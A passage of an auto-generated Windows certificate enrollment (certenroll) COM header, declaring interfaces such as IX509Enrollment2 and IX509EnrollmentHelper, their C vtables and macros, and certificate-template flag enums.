        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *CreateRequest )( 
            __RPC__in IX509Enrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *Enroll )( 
            __RPC__in IX509Enrollment2 * This);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InstallResponse )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword);
        
        HRESULT ( STDMETHODCALLTYPE *CreatePFX )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ PFXExportOptions ExportOptions,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Request )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Status )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509Enrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Response )( 
            __RPC__in IX509Enrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateFriendlyName )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateFriendlyName )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateDescription )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateDescription )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestId )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CAConfigString )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InstallResponse2 )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerUrl,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerID,
            /* [in] */ PolicyServerUrlFlags EnrollmentPolicyServerFlags,
            /* [in] */ X509EnrollmentAuthFlags authFlags);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestIdString )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509Enrollment2Vtbl;

    interface IX509Enrollment2
    {
        CONST_VTBL struct IX509Enrollment2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Enrollment2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Enrollment2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Enrollment2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Enrollment2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Enrollment2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Enrollment2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Enrollment2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Enrollment2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509Enrollment2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509Enrollment2_InitializeFromRequest(This,pRequest)	\
    ( (This)->lpVtbl -> InitializeFromRequest(This,pRequest) ) 

#define IX509Enrollment2_CreateRequest(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRequest(This,Encoding,pValue) ) 

#define IX509Enrollment2_Enroll(This)	\
    ( (This)->lpVtbl -> Enroll(This) ) 

#define IX509Enrollment2_InstallResponse(This,Restrictions,strResponse,Encoding,strPassword)	\
    ( (This)->lpVtbl -> InstallResponse(This,Restrictions,strResponse,Encoding,strPassword) ) 

#define IX509Enrollment2_CreatePFX(This,strPassword,ExportOptions,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreatePFX(This,strPassword,ExportOptions,Encoding,pValue) ) 

#define IX509Enrollment2_get_Request(This,pValue)	\
    ( (This)->lpVtbl -> get_Request(This,pValue) ) 

#define IX509Enrollment2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509Enrollment2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509Enrollment2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509Enrollment2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509Enrollment2_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 

#define IX509Enrollment2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509Enrollment2_get_Status(This,ppValue)	\
    ( (This)->lpVtbl -> get_Status(This,ppValue) ) 

#define IX509Enrollment2_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509Enrollment2_get_Response(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Response(This,Encoding,pValue) ) 

#define IX509Enrollment2_get_CertificateFriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateFriendlyName(This,pValue) ) 

#define IX509Enrollment2_put_CertificateFriendlyName(This,strValue)	\
    ( (This)->lpVtbl -> put_CertificateFriendlyName(This,strValue) ) 

#define IX509Enrollment2_get_CertificateDescription(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateDescription(This,pValue) ) 

#define IX509Enrollment2_put_CertificateDescription(This,strValue)	\
    ( (This)->lpVtbl -> put_CertificateDescription(This,strValue) ) 

#define IX509Enrollment2_get_RequestId(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestId(This,pValue) ) 

#define IX509Enrollment2_get_CAConfigString(This,pValue)	\
    ( (This)->lpVtbl -> get_CAConfigString(This,pValue) ) 


#define IX509Enrollment2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509Enrollment2_InstallResponse2(This,Restrictions,strResponse,Encoding,strPassword,strEnrollmentPolicyServerUrl,strEnrollmentPolicyServerID,EnrollmentPolicyServerFlags,authFlags)	\
    ( (This)->lpVtbl -> InstallResponse2(This,Restrictions,strResponse,Encoding,strPassword,strEnrollmentPolicyServerUrl,strEnrollmentPolicyServerID,EnrollmentPolicyServerFlags,authFlags) ) 

#define IX509Enrollment2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509Enrollment2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#define IX509Enrollment2_get_RequestIdString(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestIdString(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Enrollment2_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0083 */
/* [local] */ 

typedef 
enum WebEnrollmentFlags
    {	EnrollPrompt	= 0x1
    } 	WebEnrollmentFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0083_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0083_v0_0_s_ifspec;

#ifndef __IX509EnrollmentHelper_INTERFACE_DEFINED__
#define __IX509EnrollmentHelper_INTERFACE_DEFINED__

/* interface IX509EnrollmentHelper */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509EnrollmentHelper;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab351-217d-11da-b2a4-000e7bbb2b09")
    IX509EnrollmentHelper : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE AddPolicyServer( 
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerURI,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyID,
            /* [in] */ PolicyServerUrlFlags EnrollmentPolicyServerFlags,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE AddEnrollmentServer( 
            /* [in] */ __RPC__in BSTR strEnrollmentServerURI,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Enroll( 
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerURI,
            /* [in] */ __RPC__in BSTR strTemplateName,
            /* [in] */ EncodingType Encoding,
            /* [in] */ WebEnrollmentFlags enrollFlags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext Context) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentHelperVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509EnrollmentHelper * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509EnrollmentHelper * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509EnrollmentHelper * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *AddPolicyServer )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerURI,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyID,
            /* [in] */ PolicyServerUrlFlags EnrollmentPolicyServerFlags,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *AddEnrollmentServer )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in BSTR strEnrollmentServerURI,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Enroll )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerURI,
            /* [in] */ __RPC__in BSTR strTemplateName,
            /* [in] */ EncodingType Encoding,
            /* [in] */ WebEnrollmentFlags enrollFlags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        END_INTERFACE
    } IX509EnrollmentHelperVtbl;

    interface IX509EnrollmentHelper
    {
        CONST_VTBL struct IX509EnrollmentHelperVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509EnrollmentHelper_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509EnrollmentHelper_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509EnrollmentHelper_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509EnrollmentHelper_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509EnrollmentHelper_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509EnrollmentHelper_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509EnrollmentHelper_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509EnrollmentHelper_AddPolicyServer(This,strEnrollmentPolicyServerURI,strEnrollmentPolicyID,EnrollmentPolicyServerFlags,authFlags,strCredential,strPassword)	\
    ( (This)->lpVtbl -> AddPolicyServer(This,strEnrollmentPolicyServerURI,strEnrollmentPolicyID,EnrollmentPolicyServerFlags,authFlags,strCredential,strPassword) ) 

#define IX509EnrollmentHelper_AddEnrollmentServer(This,strEnrollmentServerURI,authFlags,strCredential,strPassword)	\
    ( (This)->lpVtbl -> AddEnrollmentServer(This,strEnrollmentServerURI,authFlags,strCredential,strPassword) ) 

#define IX509EnrollmentHelper_Enroll(This,strEnrollmentPolicyServerURI,strTemplateName,Encoding,enrollFlags,pstrCertificate)	\
    ( (This)->lpVtbl -> Enroll(This,strEnrollmentPolicyServerURI,strTemplateName,Encoding,enrollFlags,pstrCertificate) ) 

#define IX509EnrollmentHelper_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509EnrollmentHelper_INTERFACE_DEFINED__ */


#ifndef __IX509EnrollmentWebClassFactory_INTERFACE_DEFINED__
#define __IX509EnrollmentWebClassFactory_INTERFACE_DEFINED__

/* interface IX509EnrollmentWebClassFactory */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509EnrollmentWebClassFactory;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab349-217d-11da-b2a4-000e7bbb2b09")
    IX509EnrollmentWebClassFactory : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE CreateObject( 
            /* [in] */ __RPC__in BSTR strProgID,
            /* [retval][out] */ __RPC__deref_out_opt IUnknown **ppIUnknown) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentWebClassFactoryVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509EnrollmentWebClassFactory * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509EnrollmentWebClassFactory * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509EnrollmentWebClassFactory * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *CreateObject )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [in] */ __RPC__in BSTR strProgID,
            /* [retval][out] */ __RPC__deref_out_opt IUnknown **ppIUnknown);
        
        END_INTERFACE
    } IX509EnrollmentWebClassFactoryVtbl;

    interface IX509EnrollmentWebClassFactory
    {
        CONST_VTBL struct IX509EnrollmentWebClassFactoryVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509EnrollmentWebClassFactory_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509EnrollmentWebClassFactory_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509EnrollmentWebClassFactory_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509EnrollmentWebClassFactory_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509EnrollmentWebClassFactory_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509EnrollmentWebClassFactory_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509EnrollmentWebClassFactory_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509EnrollmentWebClassFactory_CreateObject(This,strProgID,ppIUnknown)	\
    ( (This)->lpVtbl -> CreateObject(This,strProgID,ppIUnknown) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509EnrollmentWebClassFactory_INTERFACE_DEFINED__ */


#ifndef __IX509MachineEnrollmentFactory_INTERFACE_DEFINED__
#define __IX509MachineEnrollmentFactory_INTERFACE_DEFINED__

/* interface IX509MachineEnrollmentFactory */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509MachineEnrollmentFactory;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab352-217d-11da-b2a4-000e7bbb2b09")
    IX509MachineEnrollmentFactory : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE CreateObject( 
            /* [in] */ __RPC__in BSTR strProgID,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentHelper **ppIHelper) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509MachineEnrollmentFactoryVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509MachineEnrollmentFactory * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509MachineEnrollmentFactory * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509MachineEnrollmentFactory * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *CreateObject )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [in] */ __RPC__in BSTR strProgID,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentHelper **ppIHelper);
        
        END_INTERFACE
    } IX509MachineEnrollmentFactoryVtbl;

    interface IX509MachineEnrollmentFactory
    {
        CONST_VTBL struct IX509MachineEnrollmentFactoryVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509MachineEnrollmentFactory_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509MachineEnrollmentFactory_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509MachineEnrollmentFactory_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509MachineEnrollmentFactory_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509MachineEnrollmentFactory_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509MachineEnrollmentFactory_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509MachineEnrollmentFactory_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509MachineEnrollmentFactory_CreateObject(This,strProgID,ppIHelper)	\
    ( (This)->lpVtbl -> CreateObject(This,strProgID,ppIHelper) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509MachineEnrollmentFactory_INTERFACE_DEFINED__ */



#ifndef __CERTENROLLLib_LIBRARY_DEFINED__
#define __CERTENROLLLib_LIBRARY_DEFINED__

/* library CERTENROLLLib */
/* [helpstring][version][uuid] */ 

typedef 
enum X509CertificateTemplateGeneralFlag
    {	GeneralMachineType	= 0x40,
	GeneralCA	= 0x80,
	GeneralCrossCA	= 0x800,
	GeneralDefault	= 0x10000,
	GeneralModified	= 0x20000,
	GeneralDonotPersist	= 0x1000
    } 	X509CertificateTemplateGeneralFlag;

typedef 
enum X509CertificateTemplateEnrollmentFlag
    {	EnrollmentIncludeSymmetricAlgorithms	= 0x1,
	EnrollmentPendAllRequests	= 0x2,
	EnrollmentPublishToKRAContainer	= 0x4,
	EnrollmentPublishToDS	= 0x8,
	EnrollmentAutoEnrollmentCheckUserDSCertificate	= 0x10,
	EnrollmentAutoEnrollment	= 0x20,
	EnrollmentDomainAuthenticationNotRequired	= 0x80,
	EnrollmentPreviousApprovalValidateReenrollment	= 0x40,
	EnrollmentUserInteractionRequired	= 0x100,
	EnrollmentAddTemplateName	= 0x200,
	EnrollmentRemoveInvalidCertificateFromPersonalStore	= 0x400,
	EnrollmentAllowEnrollOnBehalfOf	= 0x800,
	EnrollmentAddOCSPNoCheck	= 0x1000,
	EnrollmentReuseKeyOnFullSmartCard	= 0x2000,
	EnrollmentNoRevocationInfoInCerts	= 0x4000,
	EnrollmentIncludeBasicConstraintsForEECerts	= 0x8000
    } 	X509CertificateTemplateEnrollmentFlag;

typedef 
enum X509CertificateTemplateSubjectNameFlag
    {	SubjectNameEnrolleeSupplies	= 0x1,
	SubjectNameRequireDirectoryPath	= 0x80000000,
